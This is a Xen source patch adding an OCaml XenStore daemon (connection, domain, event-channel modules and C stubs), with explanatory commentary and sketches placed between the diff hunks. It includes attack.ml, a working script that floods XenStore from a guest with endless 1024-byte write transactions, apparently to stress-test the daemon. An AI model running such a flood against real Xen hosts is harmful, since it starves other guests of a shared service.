+The OCaml XenStore is a drop-in replacement for the original C one. It will be
+compiled when Xen (or the tools) are built and installed onto the system when
+Xen is installed.
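The README above describes transactions built on optimistic concurrency control and copy-on-write. As a rough illustration of that idea (not necessarily how transaction.ml in this patch does it), here is a stand-alone sketch. All names in it (PathMap, node, create_store, and so on) are hypothetical and chosen for the example. A transaction keeps an immutable snapshot of the store, which costs nothing to take because the map is persistent, and remembers the version of every path it touches. Commit succeeds only if none of those paths changed in the meantime, so a transaction hammering one path should not starve transactions on unrelated paths.

```ocaml
(* Hypothetical sketch of per-path optimistic concurrency control. *)
module PathMap = Map.Make (String)

(* Each node carries a version that is bumped whenever it is committed. *)
type node = { value : string; version : int }

type store = { mutable nodes : node PathMap.t }

type transaction = {
  snapshot : node PathMap.t;           (* immutable view taken at start *)
  mutable seen : int PathMap.t;        (* path -> version at first access *)
  mutable written : string PathMap.t;  (* path -> pending new value *)
}

(* Version of a path in a given map; 0 means the path does not exist. *)
let version_in nodes path =
  match PathMap.find_opt path nodes with
  | Some node -> node.version
  | None -> 0

let create_store () = { nodes = PathMap.empty }

(* Starting a transaction shares structure with the store: no copy. *)
let transaction_start store =
  { snapshot = store.nodes; seen = PathMap.empty; written = PathMap.empty }

(* Record the snapshot version of a path the first time it is touched. *)
let note_access t path =
  if not (PathMap.mem path t.seen) then
    t.seen <- PathMap.add path (version_in t.snapshot path) t.seen

let read t path =
  note_access t path;
  match PathMap.find_opt path t.written with
  | Some value -> Some value
  | None ->
    (match PathMap.find_opt path t.snapshot with
     | Some node -> Some node.value
     | None -> None)

let write t path value =
  note_access t path;
  t.written <- PathMap.add path value t.written

(* Commit if every touched path is unchanged; otherwise report failure
   so the caller can retry (EAGAIN in protocol terms). *)
let transaction_end store t =
  let unchanged path seen_version =
    version_in store.nodes path = seen_version in
  if PathMap.for_all unchanged t.seen then begin
    store.nodes <-
      PathMap.fold
        (fun path value nodes ->
           PathMap.add path
             { value; version = version_in nodes path + 1 } nodes)
        t.written store.nodes;
    true
  end else false
```

With this scheme, a commit to one path leaves a concurrent transaction on a different path free to commit, while two transactions writing the same path still conflict and the later one has to retry.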
diff -r 10a8fae412c5 tools/xenstore/TODO
--- a/tools/xenstore/TODO       Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,10 +0,0 @@
-TODO in no particular order.  Some of these will never be done.  There
-are omissions of important but necessary things.  It is up to the
-reader to fill in the blanks.
-
-- Timeout failed watch responses
-- Dynamic/supply nodes
-- Persistant storage of introductions, watches and transactions, so daemon can restart
-- Remove assumption that rename doesn't fail
-- Multi-root transactions, for setting up front and back ends at same time.
-
diff -r 10a8fae412c5 tools/xenstore/attack.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/attack.ml  Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,78 @@
+let xenbus_dev = "/proc/xen/xenbus";;
+
+let xenbus_open dev =
+  Unix.openfile dev [ Unix.O_RDWR ] 0o600;;
+
+let fd = xenbus_open xenbus_dev;;
+let in_set = ref [ fd ];;
+let out_set = ref [ fd ];;
+
+let rec read connection =
+  let (i, o, _) = Unix.select [ fd ] [ fd ] [] (0.0) in
+  
+  in_set := i;
+  out_set := o;
+  
+  if (connection#can_read) then (
+    match (connection#read) with
+    | Some (message) -> message
+    | None -> read connection;
+  ) else (
+    read connection;
+  );;
+
+let get_domain_path connection transaction_id domain_id =
+  connection#write (Message.make Message.XS_GET_DOMAIN_PATH transaction_id 0l (Utils.null_terminate (string_of_int domain_id)));
+  Utils.strip_null (read connection).Message.payload;;
+
+let transaction_start connection =
+  connection#write (Message.make Message.XS_TRANSACTION_START 0l 0l (Utils.null_terminate Constants.null_string));
+  Int32.of_string (Utils.strip_null (read connection).Message.payload);;
+
+let transaction_end connection transaction_id =
+  connection#write (Message.make Message.XS_TRANSACTION_END transaction_id 0l (Utils.null_terminate "T"));
+  (Utils.strip_null (read connection).Message.payload) = "OK";;
+
+let write connection transaction_id path value =
+  connection#write (Message.make Message.XS_WRITE transaction_id 0l ((Utils.null_terminate path) ^ value));
+  (Utils.strip_null (read connection).Message.payload) = "OK";;
+
+let main () =
+  Printf.printf "Initialising attack...\n"; flush stdout;
+  
+  let domain_id = ref 0
+  and verbose = ref false in
+  
+  (* Parse command-line arguments *)
+  Arg.parse [
+    ("--domid", Arg.Set_int domain_id, "   specify ID of this domain");
+    ("--verbose", Arg.Set verbose, "   enable verbose output");
+    ] (fun s -> ()) "";
+  
+  let connection = new Connection.connection (new Socket.socket_interface fd true in_set out_set) in
+  
+  Printf.printf "Initialised\n";
+  Printf.printf "Getting domain path...\n"; flush stdout;
+  
+  let domain_path = get_domain_path connection 0l !domain_id in
+  
+  Printf.printf "%s\n" domain_path; flush stdout;
+  
+  let attack_path = domain_path ^ Store.dividor_str ^ "attack"
+  and attack_payload = String.make 1024 'a' in
+  
+  Printf.printf "Attacking...\n"; flush stdout;
+  
+  let rec attack_loop () = (
+      let transaction_id = transaction_start connection in
+      if (write connection transaction_id attack_path attack_payload) then (
+        if (transaction_end connection transaction_id) then (attack_loop ());
+      );
+    )
+  in
+  
+  attack_loop ();
+  
+  Printf.printf "\nDone\n"; flush stdout;;
+
+main ();;
diff -r 10a8fae412c5 tools/xenstore/connection.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/connection.ml      Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,95 @@
+(* 
+    Connections for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+class buffer length =
+object (self)
+  val m_buffer = String.make length Constants.null_char
+  val mutable m_position = 0
+  method private position = m_position
+  method buffer = String.copy m_buffer
+  method clear =
+    String.blit (String.make self#length Constants.null_char) 0 m_buffer 0 self#length;
+    m_position <- 0
+  method length = String.length m_buffer
+  method remaining = self#length - self#position
+  method write data =
+    let length = (String.length data) in
+    String.blit data 0 m_buffer m_position length;
+    m_position <- m_position + length
+end
+
+class buffered_message =
+object (self)
+  val m_header = new buffer Message.header_size
+  val mutable m_payload = new buffer 0
+  method allocate_payload length = m_payload <- new buffer length
+  method clear =
+    self#header#clear;
+    self#allocate_payload 0
+  method header = m_header
+  method in_header = self#header#remaining <> 0
+  method in_payload = self#payload#remaining <> 0
+  method message =
+    if self#in_header
+    then Message.null_message
+    else (
+      let header = Message.deserialise_header self#header#buffer in
+      let payload = if self#payload#length = 0 then String.make header.Message.length Constants.null_char else self#payload#buffer in
+      Message.make header.Message.message_type header.Message.transaction_id header.Message.request_id payload
+    )
+  method payload = m_payload
+end
+
+class connection (interface : Interface.interface) =
+object (self)
+  val m_input_buffer = new buffered_message
+  val m_interface = interface
+  method private interface = m_interface
+  method private input_buffer = m_input_buffer
+  method private read_buffer buffer =
+    let read_buffer = String.make buffer#remaining Constants.null_char in
+    let bytes = self#interface#read read_buffer 0 (String.length read_buffer) in
+    if bytes < 0
+    then raise (Constants.Xs_error (Constants.EIO, "Connection.connection#read_buffer", "Error reading from interface"))
+    else (buffer#write (String.sub read_buffer 0 bytes); buffer#remaining = 0)
+  method private write_buffer buffer offset =
+    let length = String.length buffer in
+    let bytes_written = self#interface#write buffer offset (length - offset) in
+    if offset + bytes_written < length then self#write_buffer buffer (offset + bytes_written)
+  method can_read = self#interface#can_read
+  method can_write = self#interface#can_write
+  method destroy = self#interface#destroy
+  method read =
+    let input = self#input_buffer in
+    if input#in_header && self#read_buffer input#header
+    then (
+      let length = input#message.Message.header.Message.length in
+      if length > Constants.payload_max
+      then raise (Constants.Xs_error (Constants.EIO, "Connection.connection#read", "Payload too big"))
+      else input#allocate_payload length
+    );
+    if (not input#in_header && not input#in_payload) || (input#in_payload && self#read_buffer input#payload)
+    then (
+      let message = input#message in
+      input#clear;
+      Some (message)
+    )
+    else None
+  method write message = self#write_buffer ((Message.serialise_header message.Message.header) ^ message.Message.payload) 0
+end
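The connection class above reads a message in two stages: first a fixed-size header, then a payload whose length is taken from that header. The same framing idea can be sketched without the class machinery. The sketch below is stand-alone and hypothetical: it assumes a 16-byte header made of four little-endian 32-bit fields with the payload length in the last one, and it reuses the 4096-byte payload limit from Constants.payload_max. The names framer, feed and next are invented for the example and are not part of the patch.

```ocaml
(* Hypothetical sketch of incremental header-then-payload framing. *)
let header_size = 16     (* assumption: four 32-bit fields *)
let payload_max = 4096   (* same limit as Constants.payload_max *)

type framer = { pending : Buffer.t }

let create () = { pending = Buffer.create 64 }

(* Decode a little-endian 32-bit field starting at [offset].
   Assumes the value fits in a native OCaml int. *)
let le32 s offset =
  let byte i = Char.code s.[offset + i] in
  byte 0 lor (byte 1 lsl 8) lor (byte 2 lsl 16) lor (byte 3 lsl 24)

(* Append whatever bytes the transport delivered, however few. *)
let feed framer chunk = Buffer.add_string framer.pending chunk

(* Return the next complete (header, payload) pair, or None if more
   bytes are needed. Oversized payloads are rejected up front. *)
let next framer =
  let available = Buffer.length framer.pending in
  if available < header_size then None
  else begin
    let header = Buffer.sub framer.pending 0 header_size in
    let length = le32 header 12 in
    if length > payload_max then failwith "Payload too big"
    else if available < header_size + length then None
    else begin
      let payload = Buffer.sub framer.pending header_size length in
      let consumed = header_size + length in
      let rest = Buffer.sub framer.pending consumed (available - consumed) in
      Buffer.clear framer.pending;
      Buffer.add_string framer.pending rest;
      Some (header, payload)
    end
  end
```

A caller would call feed with each chunk it reads and then call next until it returns None, which tolerates headers and payloads that arrive split across several reads.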
diff -r 10a8fae412c5 tools/xenstore/constants.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/constants.ml       Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,82 @@
+(* 
+    Constants for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+let path_max = 4096
+let absolute_path_max = 3072
+let relative_path_max = 2048
+let payload_max = 4096
+
+(* domain_id_self is used in certain contexts to refer to oneself *)
+let domain_id_self = 0x7FF0
+
+(* The prefix character that indicates a watch event *)
+let event_char = '@'
+
+let null_char = char_of_int 0
+let null_string = String.make 0 null_char
+let null_file_descr = - 1
+
+let payload_false = "F"
+let payload_true = "T"
+
+let virq_dom_exc = 3
+
+(* Error type *)
+type error =
+  | EINVAL
+  | EACCES
+  | EEXIST
+  | EISDIR
+  | ENOENT
+  | ENOMEM
+  | ENOSPC
+  | EIO
+  | ENOTEMPTY
+  | ENOSYS
+  | EROFS
+  | EBUSY
+  | EAGAIN
+  | EISCONN
+  (* XXX: Hack to fix violation of errors specified in protocol *)
+  | E2BIG
+  | EPERM
+
+(* Return the string representation of an error *)
+let error_message error =
+  match error with
+  | EINVAL -> "EINVAL"
+  | EACCES -> "EACCES"
+  | EEXIST -> "EEXIST"
+  | EISDIR -> "EISDIR"
+  | ENOENT -> "ENOENT"
+  | ENOMEM -> "ENOMEM"
+  | ENOSPC -> "ENOSPC"
+  | EIO -> "EIO"
+  | ENOTEMPTY -> "ENOTEMPTY"
+  | ENOSYS -> "ENOSYS"
+  | EROFS -> "EROFS"
+  | EBUSY -> "EBUSY"
+  | EAGAIN -> "EAGAIN"
+  | EISCONN -> "EISCONN"
+  (* XXX: Hack to fix violation of errors specified in protocol *)
+  | E2BIG -> "E2BIG"
+  | EPERM -> "EPERM"
+
+(* Error exception *)
+exception Xs_error of error * string * string
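As an illustration of how the Xs_error exception and error_message above might be used together, here is a small stand-alone sketch. It redeclares a cut-down error type so that it compiles on its own. The reply type and the handle function are hypothetical and do not appear in the patch. The idea is that a request handler raises Xs_error, and a wrapper turns it into an error reply whose payload is the null-terminated error name.

```ocaml
(* Hypothetical sketch: turning Xs_error into an error reply. *)
type error = EINVAL | ENOENT | EAGAIN   (* cut-down copy for the example *)

let error_message error =
  match error with
  | EINVAL -> "EINVAL"
  | ENOENT -> "ENOENT"
  | EAGAIN -> "EAGAIN"

(* error, raising function, human-readable description *)
exception Xs_error of error * string * string

type reply =
  | Ok_reply of string      (* payload of a successful reply *)
  | Error_reply of string   (* null-terminated error name *)

(* Run a handler and convert any Xs_error into an error reply. *)
let handle handler request =
  try Ok_reply (handler request)
  with Xs_error (error, _where, _what) ->
    Error_reply (error_message error ^ "\000")
```

Keeping the raising function and description in the exception leaves them available for tracing, while only the error name goes back to the client.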
diff -r 10a8fae412c5 tools/xenstore/domain.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/domain.ml  Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,105 @@
+(* 
+    Domains for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+let xc_handle = Eventchan.xc_interface_open ()
+
+class domain (id : int) (connection : Connection.connection) =
+object (self)
+  val m_id = id
+  val m_connection = connection
+  val mutable m_input_list = []
+  val mutable m_output_list = []
+  val mutable m_dying = false
+  val mutable m_shutdown = false
+  method private connection = m_connection
+  method private input_list = m_input_list
+  method private output_list = m_output_list
+  method add_input_message message = m_input_list <- m_input_list @ [ message ]
+  method add_output_message message = m_output_list <- m_output_list @ [ message ]
+  method can_read = self#connection#can_read
+  method can_write = self#has_output_message && self#connection#can_write
+  method destroy = self#connection#destroy
+  method dying = m_dying <- true
+  method has_input_message = List.length self#input_list > 0
+  method has_output_message = List.length self#output_list > 0
+  method id = m_id
+  method input_message =
+    let message = List.hd self#input_list in
+    m_input_list <- List.tl m_input_list;
+    message
+  method input_messages = self#input_list
+  method is_dying = m_dying
+  method is_shutdown = m_shutdown
+  method output_message =
+    let message = List.hd self#output_list in
+    m_output_list <- List.tl m_output_list;
+    message
+  method output_messages = self#output_list
+  method read = match self#connection#read with Some (message) -> self#add_input_message message | None -> ()
+  method shutdown = m_shutdown <- true
+  method write = self#connection#write self#output_message
+end
+
+class domains =
+object (self)
+  val m_dominfo = Dominfo.init ()
+  val m_entries = Hashtbl.create 8
+  val mutable m_domains : domain list = []
+  method private check domain =
+    if Dominfo.info self#dominfo xc_handle domain#id = 1 && Dominfo.domid self#dominfo = domain#id
+    then (
+      if (Dominfo.crashed self#dominfo || Dominfo.shutdown self#dominfo) && not domain#is_shutdown then domain#shutdown;
+      if Dominfo.dying self#dominfo then domain#dying
+    );
+    domain#is_dying || domain#is_shutdown
+  method private dominfo = m_dominfo
+  method private entries = m_entries
+  method add domain =
+    m_domains <- domain :: m_domains;
+    Hashtbl.add self#entries domain#id 0
+  method cleanup = List.fold_left (fun domains domain -> if self#check domain then domain :: domains else domains) [] self#domains
+  method domains = m_domains
+  method entry_count domain_id = Hashtbl.find self#entries domain_id
+  method entry_decr domain_id =
+    let entries = try pred (Hashtbl.find self#entries domain_id) with Not_found -> 0 in
+    Hashtbl.replace self#entries domain_id (if entries < 0 then 0 else entries)
+  method entry_incr domain_id = Hashtbl.replace self#entries domain_id (try succ (Hashtbl.find self#entries domain_id) with Not_found -> 1)
+  method find_by_id domain_id = List.find (fun domain -> domain#id = domain_id) self#domains
+  method remove (domain : domain) =
+    m_domains <- List.filter (fun dom -> domain#id <> dom#id) self#domains;
+    Hashtbl.remove self#entries domain#id;
+    domain#destroy
+  method timeout = if List.exists (fun domain -> domain#can_read || domain#can_write) self#domains then 0.0 else - 1.0
+end
+
+(* Initialise an unprivileged domain *)
+let domu_init id remote_port mfn notify =
+  let port = Eventchan.bind_interdomain id remote_port in
+  let interface = new Xenbus.xenbus_interface port (Xenbus.map_foreign xc_handle id mfn) in
+  let connection = new Connection.connection interface in
+  if notify then Eventchan.notify port;
+  new domain id connection
+
+(* Check if a domain is unprivileged based on its ID *)
+let is_unprivileged_id domain_id =
+  domain_id > 0
+  
+(* Check if a domain is unprivileged *)
+let is_unprivileged domain =
+  is_unprivileged_id domain#id
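The domain class above keeps its pending messages in plain lists, appending with @ and testing for emptiness with List.length. One possible alternative, shown here only as a hypothetical sketch and not as part of the patch, is the standard Queue module, which gives constant-time enqueue, dequeue and emptiness checks. The mailbox type and its field names are invented for the example. The function names mirror the methods of the class.

```ocaml
(* Hypothetical sketch: FIFO message queues built on Stdlib's Queue. *)
type 'a mailbox = {
  input : 'a Queue.t;    (* messages received, waiting to be processed *)
  output : 'a Queue.t;   (* replies waiting to be written *)
}

let create_mailbox () = { input = Queue.create (); output = Queue.create () }

let add_input_message mailbox message = Queue.add message mailbox.input
let add_output_message mailbox message = Queue.add message mailbox.output

let has_input_message mailbox = not (Queue.is_empty mailbox.input)
let has_output_message mailbox = not (Queue.is_empty mailbox.output)

(* Both raise Queue.Empty when there is nothing to take, where the
   list version would fail inside List.hd. *)
let input_message mailbox = Queue.take mailbox.input
let output_message mailbox = Queue.take mailbox.output
```

Messages still come out in the order they were added, so the observable behaviour matches the list version apart from the exception raised on an empty queue.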
diff -r 10a8fae412c5 tools/xenstore/dominfo.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/dominfo.ml Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,47 @@
+(* 
+    Domain info for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+type t;;
+
+external get_crashed32 : t -> int32 = "get_crashed_c";;
+external get_domid32 : t -> int32 = "get_domid_c";;
+external get_dying32 : t -> int32 = "get_dying_c";;
+external get_shutdown32 : t -> int32 = "get_shutdown_c";;
+external init : unit -> t = "init_dominfo_c";;
+external xc_domain_getinfo : int -> int -> int -> t -> int = "xc_domain_getinfo_c";;
+
+(* Return crashed state *)
+let crashed dominfo =
+  get_crashed32 dominfo <> 0l
+
+(* Return domain ID *)
+let domid dominfo =
+  Int32.to_int (get_domid32 dominfo)
+
+(* Return dying state *)
+let dying dominfo =
+  get_dying32 dominfo <> 0l
+
+(* Return domain info *)
+let info dominfo xc_handle id =
+  xc_domain_getinfo xc_handle id 1 dominfo
+
+(* Return shutdown state *)
+let shutdown dominfo =
+  get_shutdown32 dominfo <> 0l
diff -r 10a8fae412c5 tools/xenstore/dominfo_c.c
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/dominfo_c.c        Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,93 @@
+/*
+    Domain info C stubs for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*/
+
+#include <stdlib.h>
+#include <unistd.h>
+
+#include <xenctrl.h>
+#include <xen/domctl.h>
+
+#include <caml/mlvalues.h>
+#include <caml/callback.h>
+#include <caml/memory.h>
+#include <caml/alloc.h>
+
+/* Initialise a domain's info */
+value init_dominfo_c (value dummy_v)
+{
+       CAMLparam1 (dummy_v);
+
+       value dominfo_v = alloc (Abstract_tag, 1);
+       Field (dominfo_v, 0) = (value) malloc (sizeof(xc_dominfo_t));
+
+       CAMLreturn (dominfo_v);
+}
+
+/* Return a domain's info */
+value xc_domain_getinfo_c (value fd_v, value domid_v, value max_doms_v, value dominfo_v)
+{
+       CAMLparam4 (fd_v, domid_v, max_doms_v, dominfo_v);
+
+       int fd = Int_val (fd_v);
+       uint32_t domid = (uint32_t)(Int_val (domid_v));
+       unsigned int max_doms = Int_val (max_doms_v);
+       xc_dominfo_t *dominfo = (xc_dominfo_t *)(Field (dominfo_v, 0));
+
+       CAMLreturn (Val_int (xc_domain_getinfo(fd, domid, max_doms, dominfo)));
+}
+
+/* Return a domain's crashed state */
+value get_crashed_c (value dominfo_v)
+{
+       CAMLparam1 (dominfo_v);
+
+       xc_dominfo_t *dominfo = (xc_dominfo_t *)(Field (dominfo_v, 0));
+
+       CAMLreturn (caml_copy_int32(dominfo->crashed));
+}
+
+/* Return a domain's ID */
+value get_domid_c (value dominfo_v)
+{
+       CAMLparam1 (dominfo_v);
+
+       xc_dominfo_t *dominfo = (xc_dominfo_t *)(Field (dominfo_v, 0));
+
+       CAMLreturn (caml_copy_int32(dominfo->domid));
+}
+
+/* Return a domain's dying state */
+value get_dying_c (value dominfo_v)
+{
+       CAMLparam1 (dominfo_v);
+
+       xc_dominfo_t *dominfo = (xc_dominfo_t *)(Field (dominfo_v, 0));
+
+       CAMLreturn (caml_copy_int32(dominfo->dying));
+}
+
+/* Return a domain's shutdown state */
+value get_shutdown_c (value dominfo_v)
+{
+       CAMLparam1 (dominfo_v);
+
+       xc_dominfo_t *dominfo = (xc_dominfo_t *)(Field (dominfo_v, 0));
+
+       CAMLreturn (caml_copy_int32(dominfo->shutdown));
+}
diff -r 10a8fae412c5 tools/xenstore/eventchan.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/eventchan.ml       Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,68 @@
+(* 
+    Event channel for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+external fake_call : unit -> int = "xc_interface_open"
+external xc_event_chan_bind_interdomain : int -> int -> int -> int = "xc_evtchn_bind_interdomain_c"
+external xc_event_chan_bind_virq : int -> int -> int = "xc_evtchn_bind_virq_c"
+external xc_event_chan_fd : int -> int = "xc_evtchn_fd_c"
+external xc_event_chan_open : unit -> int = "xc_evtchn_open_c"
+external xc_event_chan_notify : int -> int -> int = "xc_evtchn_notify_c"
+external xc_event_chan_pending : int -> int = "xc_evtchn_pending_c"
+external xc_event_chan_unbind : int -> int -> int = "xc_evtchn_unbind_c"
+external xc_event_chan_unmask : int -> int -> int = "xc_evtchn_unmask_c"
+external xc_interface_open : unit -> int = "xc_interface_open_c"
+external xc_interface_close : int -> int = "xc_interface_close_c"
+
+(* XXX: Force libxenctrl to be compiled in. There must be a better way *)
+let fake () =
+  fake_call ()
+
+let xce_handle = ref (- 1)
+
+(* Bind a domain to the remote end *)
+let bind_interdomain id remote_port =
+  xc_event_chan_bind_interdomain !xce_handle id remote_port
+
+(* Bind the virq *)
+let bind_virq virq =
+  xc_event_chan_bind_virq !xce_handle virq
+
+(* Return the event channel fd *)
+let get_channel () =
+  xc_event_chan_fd !xce_handle
+
+(* Initialise the event channel *)
+let init () =
+  xce_handle := xc_event_chan_open ()
+
+(* Notify XenBus *)
+let notify port =
+  ignore (xc_event_chan_notify !xce_handle port)
+
+(* Check for pending event *)
+let pending () =
+  xc_event_chan_pending !xce_handle
+
+(* Unbind a XenBus port *)
+let unbind port =
+  xc_event_chan_unbind !xce_handle port <> - 1
+
+(* Unmask a XenBus port *)
+let unmask port =
+  xc_event_chan_unmask !xce_handle port
diff -r 10a8fae412c5 tools/xenstore/eventchan_c.c
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/eventchan_c.c      Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,124 @@
+/*
+    Event channel C stubs for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*/
+
+#include <stdio.h>
+#include <unistd.h>
+#include <xenctrl.h>
+
+#include <caml/mlvalues.h>
+#include <caml/callback.h>
+#include <caml/memory.h>
+
+
+/* Bind an interdomain event channel */
+value xc_evtchn_bind_interdomain_c (value xce_handle_v, value domid_v, value remote_port_v)
+{
+    CAMLparam3 (xce_handle_v, domid_v, remote_port_v);
+
+    int xce_handle = Int_val (xce_handle_v);
+    int domid = Int_val (domid_v);
+    uint32_t remote_port = (uint32_t)(Int_val (remote_port_v));
+
+    CAMLreturn (Val_int (xc_evtchn_bind_interdomain (xce_handle, domid, remote_port)));
+}
+
+/* Bind the VIRQ event channel */
+value xc_evtchn_bind_virq_c (value xce_handle_v, value virq_v)
+{
+    CAMLparam2 (xce_handle_v, virq_v);
+
+    int xce_handle = Int_val (xce_handle_v);
+    unsigned int virq = Int_val (virq_v);
+
+    CAMLreturn (Val_int (xc_evtchn_bind_virq (xce_handle, virq)));
+}
+
+/* Return the event channel file descriptor */
+value xc_evtchn_fd_c (value xce_handle_v)
+{
+    CAMLparam1 (xce_handle_v);
+
+    int xce_handle = Int_val (xce_handle_v);
+
+    CAMLreturn (Val_int (xc_evtchn_fd (xce_handle)));
+}
+
+/* Notify an event channel of an event */
+value xc_evtchn_notify_c (value xce_handle_v, value port_v)
+{
+    CAMLparam2 (xce_handle_v, port_v);
+
+    int xce_handle = Int_val (xce_handle_v);
+    uint32_t port = (uint32_t)(Int_val (port_v));
+
+    CAMLreturn (Val_int (xc_evtchn_notify (xce_handle, port)));
+}
+
+/* Open the event channel */
+value xc_evtchn_open_c (value dummy_v)
+{
+    CAMLparam1 (dummy_v);
+    CAMLreturn (Val_int (xc_evtchn_open ()));
+}
+
+/* Check an event channel for pending events */
+value xc_evtchn_pending_c (value xce_handle_v)
+{
+    CAMLparam1 (xce_handle_v);
+
+    int xce_handle = Int_val (xce_handle_v);
+
+    CAMLreturn (Val_int (xc_evtchn_pending (xce_handle)));
+}
+
+/* Unbind an event channel */
+value xc_evtchn_unbind_c (value xce_handle_v, value port_v)
+{
+    CAMLparam2 (xce_handle_v, port_v);
+
+    int xce_handle = Int_val (xce_handle_v);
+    uint32_t port = (uint32_t)(Int_val (port_v));
+
+    CAMLreturn (Val_int (xc_evtchn_unbind (xce_handle, port)));
+}
+
+/* Unmask an event channel */
+value xc_evtchn_unmask_c (value xce_handle_v, value port_v)
+{
+    CAMLparam2 (xce_handle_v, port_v);
+
+    int xce_handle = Int_val (xce_handle_v);
+    uint32_t port = (uint32_t)(Int_val (port_v));
+
+    CAMLreturn (Val_int (xc_evtchn_unmask (xce_handle, port)));
+}
+
+/* Close the xc (libxenctrl) interface */
+value xc_interface_close_c (value xc_handle_v)
+{
+    CAMLparam1 (xc_handle_v);
+    CAMLreturn (Val_int (xc_interface_close (Int_val (xc_handle_v))));
+}
+
+/* Open the xc (libxenctrl) interface */
+value xc_interface_open_c (value dummy_v)
+{
+    CAMLparam1 (dummy_v);
+    CAMLreturn (Val_int (xc_interface_open ()));
+}
diff -r 10a8fae412c5 tools/xenstore/gpl-2.0.txt
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/gpl-2.0.txt        Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,339 @@
